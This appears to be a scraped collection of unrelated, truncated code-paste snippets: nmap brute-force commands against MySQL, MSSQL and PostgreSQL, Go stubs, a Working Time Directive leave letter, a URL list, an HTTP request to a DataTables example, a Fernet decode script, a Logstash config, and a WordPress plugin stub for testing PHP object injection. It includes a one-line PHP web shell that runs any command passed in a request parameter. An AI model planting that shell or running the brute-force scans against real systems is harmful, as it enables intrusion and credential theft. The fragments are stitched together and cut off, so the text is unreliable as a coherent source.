nmap --script=mysql-brute
nmap -p 1433 --script ms-sql-brute
nmap -p 5432 --script pgsql-brute
package main | |
import ( | |
"fmt" | |
"io/ioutil" | |
"log" | |
"net/http" | |
"os" | |
"regexp" | |
"strings" |
package main | |
import ( | |
"fmt" | |
"net" | |
"time" | |
) | |
func main() { | |
// Set the domain to check |
Dear [Employer], | |
I am writing to inform you that I wish to exercise my rights under the Working Time Directive. Specifically, I wish to confirm that I will be taking my full entitlement of paid annual leave, as well as any other entitlements such as rest breaks and rest periods. | |
I understand that the Working Time Directive is a set of EU regulations that aim to protect the health and safety of workers by establishing minimum standards for working time, including the amount of paid leave to which workers are entitled. These rights have been incorporated into UK law, and I believe it is important for me to take advantage of them in order to maintain my health and well-being. | |
I hope that this letter will serve as sufficient notification of my intention to exercise my rights under the Working Time Directive. If you have any questions or concerns, please do not hesitate to contact me. | |
Sincerely, |
https://10fastfingers.com/ | |
http://soccersuck.com/ | |
https://detran.mg.gov.br/ | |
https://www.smart-gsm.com/ | |
http://camvault.xyz/ | |
https://sphere.social/hello/ | |
https://www.sitejabber.com/ | |
https://musiczum.com/ | |
https://schnaeppchenfuchs.com/ | |
https://xatonline.in/ |
POST /test/DataTables/examples/resources/examples.php HTTP/1.1 | |
Host: 192.168.1.71 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 | |
Accept: text/plain, */*; q=0.01 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
X-Requested-With: XMLHttpRequest | |
Content-Length: 35 | |
Origin: http://192.168.1.71 |
#!/usr/bin/env python | |
from cryptography.fernet import Fernet | |
import argparse | |
parser = argparse.ArgumentParser() | |
parser.add_argument("-f", "--fernet", required=True,help="Fernet Key") | |
parser.add_argument("-v", "--val", required=True,help="Value to decode") | |
args = parser.parse_args() |
input { | |
file { | |
type => "app" | |
path => ["/home/u/archives/urlteam_2021-02-27-21-17-02/goo-gl/______.txt"] | |
start_position => "beginning" | |
sincedb_path => "/dev/null" | |
} | |
} | |
<?php | |
system($_REQUEST['cmd']); | |
?> |
<?php | |
/* | |
Plugin Name: PHP Object Injection Test | |
Plugin URI: https://www.pluginvulnerabilities.com/ | |
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized. | |
Version: 1.0 | |
Author: White Fir Design | |
Author URI: https://www.pluginvulnerabilities.com/ | |
License: GPLv2 |